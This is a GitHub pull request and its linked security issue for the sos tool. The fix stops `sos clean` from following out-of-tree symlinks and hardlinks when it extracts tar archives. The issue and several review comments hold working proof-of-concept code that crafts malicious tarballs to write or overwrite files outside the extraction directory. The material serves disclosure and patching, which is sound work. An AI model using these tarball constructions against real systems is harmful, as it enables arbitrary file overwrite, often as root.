### PR TITLE
[cleaner] refuse out-of-tree tar members on extract

### LINKED ISSUE #4460: [cleaner] extract follows out-of-tree tar symlinks
| | |
|---|---|
| **Component** | `sos/cleaner/archives/__init__.py` — `extract_archive()` |
| **CWE** | [CWE-22](https://cwe.mitre.org/data/definitions/22.html) Path Traversal; [CWE-59](https://cwe.mitre.org/data/definitions/59.html) Link Following |
| **CVSS 3.1** | `AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H` (**7.8**) |
| **Affected** | sos `main` (`4.12.0-4-g5c7e63ee` and current `extract_archive()`) |

## Summary

`sos clean` extracts a caller-supplied tarball with `tarfile.fully_trusted_filter`. A dest-containment check exists but only inspects `member.name`. It does not inspect symlink or hardlink targets. `extractall()` can therefore write files outside the extract directory as the process UID.

Fix proposed at https://github.com/sosreport/sos/pull/4461

## Impact

`sos clean` is commonly run as **root** on a third-party sosreport (support / customer archive). A crafted tarball can create or overwrite arbitrary files writable by that UID (e.g. cron jobs, `authorized_keys`, service units). Integrity, confidentiality (by overwrite/replacement), and availability are all High. User interaction is required: the operator must pass the archive to `sos clean`.

## Technical details

`extract_archive()` sets:

```python
archive.extraction_filter = getattr(tarfile, 'fully_trusted_filter',
                                    (lambda member, path: member))
```

Then, for each member:

```python
member_path = os.path.join(path, member.name)
abs_target = os.path.abspath(member_path)
if os.path.commonprefix([abs_directory, abs_target]) != abs_directory:
    raise Exception(...)
```

`fully_trusted_filter` is PEP-706 legacy extract (follows links, no dest restriction). The guard only concatenates dest + `member.name`.

For both of the following, `abspath(dest + name)` stays under dest, so the guard allows them:

1. `SYMTYPE` member `sosreport-host/var/log/link` with `linkname` an absolute host path
2. `REGTYPE` member `sosreport-host/var/log/link/<file>`

`extractall()` creates the symlink, then writes `<file>` through it, outside dest.

This path was taken after `#3330`: `data_filter` raised false positives on Python 3.10/3.11, so extraction was switched to `fully_trusted`.

Confirmed on Python 3.14.

## Reproducer

```python
import io, os, tarfile, tempfile

def vulnerable_extract_archive(archive_path, tmpdir):
    """Verbatim from sos/cleaner/archives/__init__.py (main branch)."""
    with tarfile.open(archive_path) as archive:
        path = os.path.join(tmpdir, 'cleaner')
        archive.extraction_filter = getattr(
            tarfile, 'fully_trusted_filter',
            (lambda member, path: member))

        members = archive.getmembers()
        for member in members:
            member_path = os.path.join(path, member.name)
            abs_directory = os.path.abspath(path)
            abs_target = os.path.abspath(member_path)
            prefix = os.path.commonprefix([abs_directory, abs_target])
            if prefix != abs_directory:
                raise Exception("Attempted path traversal in tarfile")
        archive.extractall(path, members=members)

victim_dir = tempfile.mkdtemp(prefix="sos-victim-")
victim_file = os.path.join(victim_dir, "pwned")

tar_path = tempfile.mktemp(suffix=".tar")
with tarfile.open(tar_path, "w") as tf:
    sl = tarfile.TarInfo(name="sosreport-host/var/log/link")
    sl.type = tarfile.SYMTYPE
    sl.linkname = victim_dir
    tf.addfile(sl)

    payload = b"WRITTEN-OUTSIDE-DEST\n"
    rf = tarfile.TarInfo(name="sosreport-host/var/log/link/pwned")
    rf.size = len(payload)
    tf.addfile(rf, io.BytesIO(payload))

dest = tempfile.mkdtemp(prefix="sos-extract-")
vulnerable_extract_archive(tar_path, dest)

if os.path.exists(victim_file):
    print("VULNERABLE:", open(victim_file).read())
else:
    print("NOT VULNERABLE")

os.remove(tar_path)
```

Expected: `NOT VULNERABLE` — the symlink member should be rejected.  
Actual: `VULNERABLE: WRITTEN-OUTSIDE-DEST` — the file is created at the symlink target.

**AV:L** local processing of the archive · **AC:L** no special conditions · **PR:N** attacker needs no privileges on the cleaner host · **UI:R** operator runs `sos clean` on the archive · **S:U** impact is on that host · **C/I/A:H** arbitrary write as the cleaner UID (typically root).

Reported-by: Sandipan Roy

### PR DESCRIPTION
**Pull request by ByteHackr**
Closes https://github.com/sosreport/sos/issues/4460

`sos clean` used `fully_trusted_filter` plus a member-name-only path guard. That does not stop a symlink whose target is an absolute host path followed by a regular file with the same relative name, so extraction can write outside the dest directory.

Use PEP-706 `data_filter` when available and skip `FilterError` members. Keep in-tree relative symlinks.

---
Please place an 'X' inside each '[]' to confirm you adhere to our [Contributor Guidelines](https://github.com/sosreport/sos/wiki/Contribution-Guidelines)

- [X] Is the commit message split over multiple lines and hard-wrapped at 72 characters?
- [X] Is the subject and message clear and concise?
- [X] Does the subject start with **[plugin_name]** if submitting a plugin patch or a **[section_name]** if part of the core sosreport code?
- [X] Does the commit contain a **Signed-off-by: First Lastname <email@example.com>**?
- [X] Are any related Issues or existing PRs [properly referenced](https://docs.github.com/en/issues/tracking-your-work-with-issues/creating-issues/linking-a-pull-request-to-an-issue#linking-a-pull-request-to-an-issue-using-a-keyword) via a Closes (Issue) or Resolved (PR) line?
- [X] Are all passwords or private data gathered by this PR [obfuscated](https://github.com/sosreport/sos/wiki/How-to-Write-a-Plugin#how-to-prevent-collecting-passwords)?

### CODE REVIEW

File: sos/cleaner/archives/__init__.py [hunk 1]
```diff
@@ -25,28 +25,57 @@
...
+    absolute links (common in raw sosreports, and the TarSlip primitive)
+    are skipped rather than aborting the whole extraction. ``fully_trusted``
+    is not used: a member-name-only ``abspath``/``commonprefix`` guard does
+    not stop a symlink-to-absolute-path followed by a regular file of the
+    same relative name.
+    """
+    data_filter = getattr(tarfile, 'data_filter', None)
+    if data_filter is not None:
+        try:
+            return data_filter(member, dest_path)
```
Comment (pmoravec) [inline sos/cleaner/archives/__init__.py]: This sadly causes a regression on Python 3.12+ / whenever `data_filter` is present in `tarfile` class.

`data_filter` silently drops block devices and FIFOs, where esp. the block devices are legitimate members of a sosreport. While current `sos clean` keeps them in the archive.

Older Python versions would keep block devices and FIFOs, hence we would have an inconsistent behaviour of `sos clean`, depending on Python version used.

There is a legitimate question "oh, `sos clean` does not touch block device files, is that safe? Can't they contain some sensitive data to clean? Or.. isn't it safer to remove them..?" I am a noob on block devices, so I have no opinion how `sos clean` should handle them.

Comment (pmoravec) [reply sos/cleaner/archives/__init__.py]: I think one potential fix of this comment is modifying the `except tarfile.FilterError` to something like:

```
        except tarfile.FilterError as e:
            # data_filter rejects special files, but sosreports legitimately
            # contain them (collected from /dev, /proc, etc.). Re-validate
            # just the path/symlink safety and allow special files through.
            if member.isdev() or member.isfifo():
                # Still validate the path is within destination
                dest_path_abs = os.path.abspath(dest_path)
                member_path = os.path.abspath(os.path.join(dest_path_abs, member.name))
                if _path_is_within(dest_path_abs, member_path):
                    return member  # Safe special file, allow it
            # All other FilterError cases: reject
            return None
```

but that means some code duplication I dont like much..

File: sos/cleaner/archives/__init__.py [hunk 2]
```diff
@@ -25,28 +25,57 @@
...
+
+    PEP-706 ``data_filter`` is the primary check. Out-of-tree symlinks and
+    absolute links (common in raw sosreports, and the TarSlip primitive)
+    are skipped rather than aborting the whole extraction. ``fully_trusted``
+    is not used: a member-name-only ``abspath``/``commonprefix`` guard does
+    not stop a symlink-to-absolute-path followed by a regular file of the
+    same relative name.
+    """
+    data_filter = getattr(tarfile, 'data_filter', None)
+    if data_filter is not None:
```
Comment (pmoravec) [inline sos/cleaner/archives/__init__.py]: This code (as well as `dest_path = os.path.abspath(dest_path)`) is redundantly re-evaluated for each and every member of the archive (typical sosreport contains a few tens of thousands of files). Please make these calls just once.


Potential implementation here: can't you nest the rest of the method inside a nested function, and have:

```
def _make_safer_extract_filter(dest_path):
    abs_dest = os.path.abspath(dest_path)
    data_filter = getattr(tarfile, 'data_filter', None)

    def filter_func(member, dest_path):
    # here is vast majority of the original method

    return filter_func
```

? (I dont insist on this specific idea, though)

File: sos/cleaner/archives/__init__.py [hunk 3]
```diff
@@ -25,28 +25,57 @@
 # python older than 3.8 will hit a pickling error when we go to spawn a new
 # process for extraction if this method is a part of the SoSObfuscationArchive
 # class. So, the simplest solution is to remove it from the class.
+def _path_is_within(directory, target):
+    """Return True if *target* is directory or a descendant of it."""
+    directory = os.path.abspath(directory)
+    target = os.path.abspath(target)
```
Comment (pmoravec) [inline sos/cleaner/archives/__init__.py]: These `os.path.abspath` calls are redundant - the method is called for arguments already "abspath-ed".

**Comment by TurboTurtle** [comment]
I have nothing more to add to @pmoravec's initial review

File: sos/cleaner/archives/__init__.py (hunk 1 above)
Comment (bmr-cymru) [reply sos/cleaner/archives/__init__.py]: So a "block/char device" in this context is purely a device special file inode: it just carries inode information (mode/ownership/maj/min/xattrs). Similarly for named FIFOs. They have historically been included (along with much of `/dev`) in the tarball because they carry potentially useful diagnostic information.

File: sos/cleaner/archives/__init__.py [hunk 4]
```diff
@@ -25,28 +25,73 @@
 # python older than 3.8 will hit a pickling error when we go to spawn a new
 # process for extraction if this method is a part of the SoSObfuscationArchive
 # class. So, the simplest solution is to remove it from the class.
```
Comment (bmr-cymru) [inline sos/cleaner/archives/__init__.py]: This comment has become detached from the code it originally described

File: sos/cleaner/archives/__init__.py [hunk 5]
```diff
@@ -25,28 +25,73 @@
...
         not_root = os.getuid() != 0
         members = archive.getmembers()
         for member in members:
-            member_path = os.path.join(path, member.name)
-            abs_directory = os.path.abspath(path)
-            abs_target = os.path.abspath(member_path)
-            prefix = os.path.commonprefix([abs_directory, abs_target])
-            if prefix != abs_directory:
-                raise Exception(f"Attempted path traversal in tarfle"
-                                f"{prefix} != {abs_directory}")
```
Comment (bmr-cymru) [inline sos/cleaner/archives/__init__.py:49]: This is the source of the current weakness; PEP706 rightly says: "When verifying members in advance, it may be necessary to track how each member would have changed the filesystem, e.g. how symlinks are being set up. This is hard. **We can’t expect users to do it**." (emph added).

**Review by bmr-cymru — COMMENTED** [review]
Aside from @pmoravec 's points, I wonder if for the cleaner use case we couldn't get away with using the predefined `'tar'` filter?

* Strip leading slashes (/ and [os.sep](https://docs.python.org/3/library/os.html#os.sep)) from filenames.

* [Refuse](https://docs.python.org/3/library/tarfile.html#tarfile-extraction-refuse) to extract files with absolute paths (in case the name is absolute even after stripping slashes, e.g. C:/foo on Windows). This raises [AbsolutePathError](https://docs.python.org/3/library/tarfile.html#tarfile.AbsolutePathError).

* Normalize filenames ([TarInfo.name](https://docs.python.org/3/library/tarfile.html#tarfile.TarInfo.name)) that contain .. components using [os.path.normpath()](https://docs.python.org/3/library/os.path.html#os.path.normpath). Note that this removes internal .. components, which may change the meaning of the name if it traverses symbolic links.

* [Refuse](https://docs.python.org/3/library/tarfile.html#tarfile-extraction-refuse) to extract files whose absolute path (after following symlinks) would end up outside the destination. This raises [OutsideDestinationError](https://docs.python.org/3/library/tarfile.html#tarfile.OutsideDestinationError).

* Clear high mode bits (setuid, setgid, sticky) and group/other write bits ([S_IWGRP](https://docs.python.org/3/library/stat.html#stat.S_IWGRP) | [S_IWOTH](https://docs.python.org/3/library/stat.html#stat.S_IWOTH)).

The problematic parts here seem to be the name normalisation (which would alter the symlink structure), and the high mode bits. Could this be acceptable for the clean use cases?

File: sos/cleaner/archives/__init__.py (hunk 1 above)
Comment (pmoravec) [reply sos/cleaner/archives/__init__.py]: so I guess worth collecting them if they sit inside the archive directory, and ignore them if they are a target of a symlink outside archive.

**Comment by pmoravec** [comment]
Preliminary review reveals no issue. We might consider adding some logging when untar-ing rejects a file, not sure how worth it is.

I will review the PR further more today.

**Review by pmoravec — APPROVED** [review]
ACK from me. Unsure if it is worth to shout out (even as info/debug log) we are dropping extraction of some files outside the directory.

Hard to compare the PR to Bryn's proposal. It sounds to me similarly good as this one, per the description. Can it work for all supported Python versions? Will we get shorter or cleaner code?

Putting that discussion aside, for the matter of fixing the vulnerability, the PR sounds good to me.

**Comment by bmr-cymru** [comment]
@pmoravec agreed: my only outstanding request for this PR is to fix the comment position above the `extract_archive()` function. @ByteHackr could you push a revised commit to keep the comment with the code it describes?

With a fix & a regression test in place we can revisit this in future and possibly simplify things further.

File: tests/unittests/cleaner_tests.py [hunk 6]
```diff
@@ -723,3 +723,66 @@ def test_packed_dirs_empty_for_premature_manifest(self):
...
+        extract_archive(tar_path, dest)
+        found_link = None
+        for root, _, files in os.walk(dest):
+            if 'motd.link' in files:
+                found_link = os.path.join(root, 'motd.link')
+                break
+        self.assertTrue(found_link and os.path.islink(found_link))
+        self.assertEqual(os.readlink(found_link), 'motd')
+        os.remove(tar_path)
+
```
Comment (pmoravec) [inline tests/unittests/cleaner_tests.py]: pylint complains:

```
tests/unittests/cleaner_tests.py:788:0: C0305: Trailing newlines (trailing-newlines)
```

File: tests/unittests/cleaner_tests.py [hunk 7]
```diff
@@ -723,3 +723,66 @@ def test_packed_dirs_empty_for_premature_manifest(self):
...
+class ExtractArchiveSafetyTests(unittest.TestCase):
+    """Out-of-tree symlink members must not write outside dest."""
+
+    def _write_tar(self, members):
+        import io
+        import tarfile
+        import tempfile
+        handle = tempfile.NamedTemporaryFile(suffix='.tar', delete=False)
+        handle.close()
```
Comment (pmoravec) [inline tests/unittests/cleaner_tests.py]: pylint complains:

```
tests/unittests/cleaner_tests.py:735:17: R1732: Consider using 'with' for resource-allocating operations (consider-using-with)
```

**Review by pmoravec — APPROVED** [review]
LGTM.

Please @TurboTurtle or @arif-ali or @bmr-cymru for 2nd review, to let it merged.

**Comment by sandrobonazzola** [comment]
Looks like test is failing on Debian 12:
```
======================================================================
FAIL: test_absolute_symlink_does_not_write_outside_dest (tests.unittests.cleaner_tests.ExtractArchiveSafetyTests.test_absolute_symlink_does_not_write_outside_dest)
----------------------------------------------------------------------
Traceback (most recent call last):
  File "/__w/sos/sos/sos/tests/unittests/cleaner_tests.py", line 763, in test_absolute_symlink_does_not_write_outside_dest
    self.assertFalse(
AssertionError: True is not false : extraction followed an out-of-tree symlink

[':0', ':2']
----------------------------------------------------------------------
Ran 172 tests in 4.357s

FAILED (failures=1)
```

File: tests/unittests/cleaner_tests.py [hunk 8]
```diff
@@ -723,3 +723,94 @@ def test_packed_dirs_empty_for_premature_manifest(self):
...
+
+
+class ExtractArchiveSafetyTests(unittest.TestCase):
+    """Out-of-tree symlink members must not write outside dest."""
+
+    def _write_tar(self, members):
+        import io
+        import tarfile
+        import tempfile
+        with tempfile.NamedTemporaryFile(suffix='.tar', delete=False) as handle:
```
Comment (pmoravec) [inline tests/unittests/cleaner_tests.py:735]: pylint shouts

```
tests/unittests/cleaner_tests.py:735:80: E501 line too long (80 > 79 characters)
```

File: sos/cleaner/archives/__init__.py [hunk 9]
```diff
@@ -22,36 +22,88 @@
...
+
+    def _filter(member, dest_path):
+        if data_filter is not None:
+            try:
+                return data_filter(member, dest_path)
+            except tarfile.FilterError:
+                if (member.isdev() or member.isfifo()) \
+                        and _member_path_ok(abs_dest, member):
+                    return member
+                return None
```
Comment (pmoravec) [inline sos/cleaner/archives/__init__.py:75]: Worth logging here (and 3 lines below as well) an audit-like warning like:

```
logging.getLogger('sos').warning(
        "[cleaner] skipping tar member %r: %s", member.name, e)
```

(for `e` as the exception)? We shall warn the user we automatically drop some files (for auditing purposes and to warn about potentially malicious archive content).

Sorry for suggesting this even now, I run yet another round of review (once I spot the ylint issue / the need of modifying the PR either way).

**Comment by pmoravec** [comment]
Yet another error found: when non-root user is extracting sosreport tarball that contains a (root-owned) device file, an uncaught exception is raised.

Reproducer:

```
SOSD="sosreport-testhost-20260902"
mkdir -p "$SOSD/etc"
echo "testhost"            > "$SOSD/etc/hostname"
echo "nameserver 8.8.8.8" > "$SOSD/etc/resolv.conf"
echo "127.0.0.1 localhost" > "$SOSD/etc/hosts"
echo 'NAME="RHEL"'         > "$SOSD/etc/os-release"

python3 - <<'EOF'
import tarfile, os

SOSD = os.environ.get("SOSD", "sosreport-testhost-20260902")

with tarfile.open(f"{SOSD}.tar.gz", "w:gz") as tf:
    # two regular files collected before /dev (will be extracted)
    tf.add(f"{SOSD}/etc/hostname")
    tf.add(f"{SOSD}/etc/resolv.conf")

    # char device node — tar uses lstat() only, no open(), no root needed
    tf.add("/dev/null", arcname=f"{SOSD}/dev/null")

    # two regular files collected after /dev — DROPPED by sos clean
    tf.add(f"{SOSD}/etc/hosts")
    tf.add(f"{SOSD}/etc/os-release")
EOF
```

That "inserts" `/dev/null` in the middle of the tarball. `sos clean` then fails:

```
sosreport-testhost-20260902 :                      Extracting...
concurrent.futures.process._RemoteTraceback: 
"""
Traceback (most recent call last):
  File "/usr/lib64/python3.14/concurrent/futures/process.py", line 254, in _process_worker
    r = call_item.fn(*call_item.args, **call_item.kwargs)
  File "/home/pmoravec/path/to/sos/sos/cleaner/archives/__init__.py", line 100, in extract_archive
    archive.extractall(path, members=members)
    ~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib64/python3.14/tarfile.py", line 2480, in extractall
    self._extract_one(tarinfo, path, set_attrs=not tarinfo.isdir(),
    ~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                      numeric_owner=numeric_owner,
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                      filter_function=filter_function)
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib64/python3.14/tarfile.py", line 2590, in _extract_one
    self._handle_fatal_error(e)
    ~~~~~~~~~~~~~~~~~~~~~~~~^^^
  File "/usr/lib64/python3.14/tarfile.py", line 2584, in _extract_one
    self._extract_member(tarinfo, os.path.join(path, tarinfo.name),
    ~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                         set_attrs=set_attrs,
                         ^^^^^^^^^^^^^^^^^^^^
                         numeric_owner=numeric_owner,
                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                         filter_function=filter_function,
                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                         extraction_root=path)
                         ^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib64/python3.14/tarfile.py", line 2679, in _extract_member
    self.makedev(tarinfo, targetpath)
    ~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib64/python3.14/tarfile.py", line 2763, in makedev
    os.mknod(targetpath, mode,
    ~~~~~~~~^^^^^^^^^^^^^^^^^^
             os.makedev(tarinfo.devmajor, tarinfo.devminor))
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
PermissionError: [Errno 1] Operation not permitted
"""

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/pmoravec/pah/to/sos/bin/sos", line 22, in <module>
    sos.execute()
    ~~~~~~~~~~~^^
  File "/home/pmoravec/path/to/sos/sos/__init__.py", line 192, in execute
    self._component.execute()
    ~~~~~~~~~~~~~~~~~~~~~~~^^
  File "/home/pmoravec/path/to/sos/sos/cleaner/__init__.py", line 463, in execute
    self.report_paths[0].extract()
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^
  File "/home/pmoravec/path/to/sos/sos/cleaner/archives/__init__.py", line 438, in extract
    self.extracted_path = self.extract_self()
                          ~~~~~~~~~~~~~~~~~^^
  File "/home/pmoravec/path/to/sos/sos/cleaner/archives/__init__.py", line 552, in extract_self
    path = _path_future.result()
  File "/usr/lib64/python3.14/concurrent/futures/_base.py", line 454, in result
    return self.__get_result()
           ~~~~~~~~~~~~~~~~~^^
  File "/usr/lib64/python3.14/concurrent/futures/_base.py", line 396, in __get_result
    raise self._exception
PermissionError: [Errno 1] Operation not permitted
```

The reason is `archive.extractall(path, members=members)` is called also for `dev/null` and an attempt to create the file fails on `makedev()` -> `os.mknod()` -> `PermissionError`.

We should properly unpack such tarball under root (works fine with the patch) and under non-root (raises the error, we should drop such files imho, likewise `tar` drops).

**Comment by bmr-cymru** [comment]
@pmoravec is running `sos clean` as non-root even supported by the current code? It flat out fails on a build tree  (which is to be expected). The man page (`sos-clean(1)`) is unclear on this:

> TARGET    The path to the archive that is to be obfuscated. This may be an archive or an unbuilt sos temporary directory.  If an archive, it will first be extracted and then after obfuscation is complete re-compressed using the same compression method as the original.

```text
# sos report -v --batch --build --profile storage
...
$ sos clean /var/tmp/sosreport-bmr-somehost-2026-09-08-gxscmyq/
Could not initialize 'clean': [Errno 13] Permission denied: '/etc/sos/cleaner/cleaner_cache/soshostnamemap'
```

It's not happy with tarballs either (after `chown`):

```text
# sos report -v --batch --profile storage
# chown bmr:bmr sosreport-bmr-somehost-2026-09-08-tlyisve.tar.xz
...
$ sos clean /var/tmp/sosreport-bmr-somehost-2026-09-08-tlyisve.tar.xz
Could not initialize 'clean': [Errno 13] Permission denied: '/etc/sos/cleaner/cleaner_cache/soshostnamemap'
```

In *principal* the tool is just munging archive data, and that *shouldn't* require root privs, but given how the tarball is currently constructed (and the commitment to reflecting actual file system structure/perms) I don't see a straightforward way to do this: it would require something like extracting the archive into a sandbox, rewriting modes on-the-fly, and then reversing the changes when re-packing. This is feasible but I think it's a considerable amount of work from where `sos clean` is now.

I think for now it would be best to set `root_required = True` on the `SoSCleaner` class (unless I'm being really dumb.. I don't see how it can work right now—I am not super familiar with the `sos.cleaner` code).

**Comment by pmoravec** [comment]
`sos clean` can be run under non-root user, one just needs to specify `--tmp-dir` and `--map-file` (I think the `cleaner_cache` dir is created alongside the `--map-file` filepath). I know I was able to have a PoC of a service that cleans sosreports "on demand" - worker processes of `httpd` should not and did not run with root privileges. This is one use case that I guess will be demanded more in future.

There are multiple use cases where cleanup can be or should be run outside the diagnosed system, and a redaction tool should not require root privileges.

Anyway, we can discuss this outside of this PR and potentially fix some other issues related to that (similar like https://github.com/sosreport/sos/commit/ea9c0c4ec69a9181dc00c30712a5d7ca5b3f3390 I fixed).

So if I put this non-root user regression aside, I am good with the PR (up to the pylint stuff).

**Comment by bmr-cymru** [comment]
> sos clean can be run under non-root user, one just needs to specify --tmp-dir and --map-file

OK: that's just my ignorance in that case.

I would say from a UX point of view the current behaviour for non-root users is rather non-obvious, and the docs do not help much (the default for `--map-file` pointing into `/etc` is really the only hint).

It also runs into issues with a `--build` tree unless permissions are modified all the way down the tree (`sos_commands` is root:root / 0o700, so the command outputs are unreadable). Right now it just skips everything and exits with success.

I think this should be documented clearly, and I think the error messages when those arguments are not given (and euid != 0) could be better, but these are all separate issue from this PR: I'll open issues to follow up on them.

**Comment by arif-ali** [comment]
@ByteHackr please address the comments from @pmoravec wrt to the linting, and then we can move this one along. As CVE has been generated, that will case the sos package to be removed from Debian in October, so lets get through this one, so that we can patch sos in a timely manner. Thanks for your work on this.

**Review by pmoravec — APPROVED** [review]
There is some no-op code or a corner case in some setups that I am double-checking, but both are minor issues. As I dont want to block the PR further, let approve it now and I will report those later on (after I confirm my hypothesis).

The PR does fixes the security issue, covers (almost) all corner cases, does have sufficient tests, can be merged from my point of view.

Thanks @ByteHackr for reporting, patch proposal and followups on our feedback.

**Comment by pmoravec** [comment]
Our goal: have the CVE been closed soon. Since the cookbook for potential attacker is known for a month already, we should not prolong this period for further long.

But one corner case is not fixed.

I am happy to propose a subsequent patch (for inclusion in the CVE), or let the author to extend their PR accordingly - whatever will be faster. I suggest either the PR implements a fix of the corner case in 2 days, or the PR is merged and I open the followup one.

Missing piece: in Python <3.12, hardlink traversal in `_member_path_ok` is still exploitable vector.

Reproducer on Python<3.12, e.g. (but not only) on RHEL9 with its 3.9:

```
# ── workspace ────────────────────────────────────────────────────────────────
export WORK=$(mktemp -d)
export VICTIM="$WORK/victim_secret"
echo "HOST_SECRET_DATA" > "$VICTIM"
export TAR="$WORK/sosreport-testhost.tar"

# ── build malicious tar ───────────────────────────────────────────────────────
python3 - <<'EOF'
import tarfile, io, os
work = os.environ["WORK"]
with tarfile.open(f"{work}/sosreport-testhost.tar", "w") as tf:
    info = tarfile.TarInfo(name="sosreport-testhost/etc/hosts")
    data = b"127.0.0.1 localhost\n"; info.size = len(data)
    tf.addfile(info, io.BytesIO(data))
    hdr = tarfile.TarInfo(name="sosreport-testhost/deeper/evil_link")
    hdr.type = tarfile.LNKTYPE
    hdr.linkname = "../victim_secret"   # 1 level up from abs_dest → outside
    tf.addfile(hdr)
EOF

# ── extract (data_filter removed = Python 3.11.2) ────────────────────────────
python3 - <<'EOF'
import os, sys, tarfile
if hasattr(tarfile, "data_filter"): del tarfile.data_filter
work = os.environ["WORK"]
sys.path.insert(0, "/home/pmoravec/sos-trunk/sos-main/sos")
from sos.cleaner.archives import extract_archive
extract_archive(f"{work}/sosreport-testhost.tar", work)
EOF

# ── verify ────────────────────────────────────────────────────────────────────
LINK=$(find "$WORK/cleaner" -name evil_link)
echo "victim inode : $(stat -c '%i' "$VICTIM")"
echo "evil_link inode: $(stat -c '%i' "$LINK")"
echo "victim nlink : $(stat -c '%h' "$VICTIM")   # 2 = hardlink created outside abs_dest"

echo "OVERWRITTEN_BY_ATTACKER" > "$LINK"
echo "victim content: $(cat "$VICTIM")"           # HOST_SECRET_DATA → OVERWRITTEN_BY_ATTACKER
```

Potential patch over this PR:

```
--- a/sos/cleaner/archives/__init__.py
+++ b/sos/cleaner/archives/__init__.py
@@ -40,11 +40,20 @@ def _member_path_ok(abs_dest, member):
         return False
     if member.issym() or member.islnk():
         if os.path.isabs(member.linkname):
+            # Absolute linkname is the same for both types: check it directly.
             link_target = member.linkname
-        else:
+        elif member.issym():
+            # Symlink: target is relative to the directory that will contain
+            # the symlink on disk, i.e. dirname(member_path).
             link_target = os.path.abspath(
                 os.path.join(os.path.dirname(member_path), member.linkname)
             )
+        else:
+            # Hardlink: tarfile resolves linkname relative to abs_dest (the
+            # archive root), not relative to the member's directory.
+            link_target = os.path.abspath(
+                os.path.join(abs_dest, member.linkname)
+            )
         if not _path_is_within(abs_dest, link_target):
             return False
     return True
```

File: sos/cleaner/archives/__init__.py [hunk 10]
```diff
@@ -22,36 +22,100 @@
...
+        members = []
+        for member in archive.getmembers():
+            member = filt(member, path)
+            if member is None:
+                continue
             # Directories collected from the host may lack u+w or u+x
             # permissions, preventing child members from being created during
             # extract
             if not_root and member.isdir():
                 member.mode |= stat.S_IWUSR | stat.S_IXUSR
```
Comment (pmoravec) [inline sos/cleaner/archives/__init__.py:112]: Two minor issues here:

1) `member.mode` is deliberately set to `None` by CPython, when running under non-root user, and then we have a `TypeError` here due to `None |= int`.

2) the adding perms for dirs is a no-op for Python 3.12+ since `data_filter` returns a copy of the `TarInfo`, and we dont modify the original members.

Again, no critical issue, so I am OK to have the PR merged and resolve these issues found as a followups. The hardlink should be fixed within the CVE, these two issues are not security related.

**Comment by jcastill** [comment]
@sosreport/core team please, we need one more ack and then we can merge this PR and start working downstream on the errata releases

**Comment by bmr-cymru** [comment]
I am happy with the changes in this PR but I think it would be wise to consider including @pmoravec suggestion for the hardlink case: it seems valid, and I don't think it is worth cranking the errata machine with that gap unfixed.

**Comment by TurboTurtle** [comment]
I concur with @bmr-cymru, Pavel raises a valid concern and we even have a potential fix already provided. I'd rather we carry this whole for a complete fix, rather than chase known edge cases.

@ByteHackr if you can pull in Pavel's suggestions into this PR within the next day, we can do that. Otherwise @pmoravec, you're able to push to this branch directly so you could add your commit and push to this PR. Let's say do that Friday if the PR is otherwise not updated.
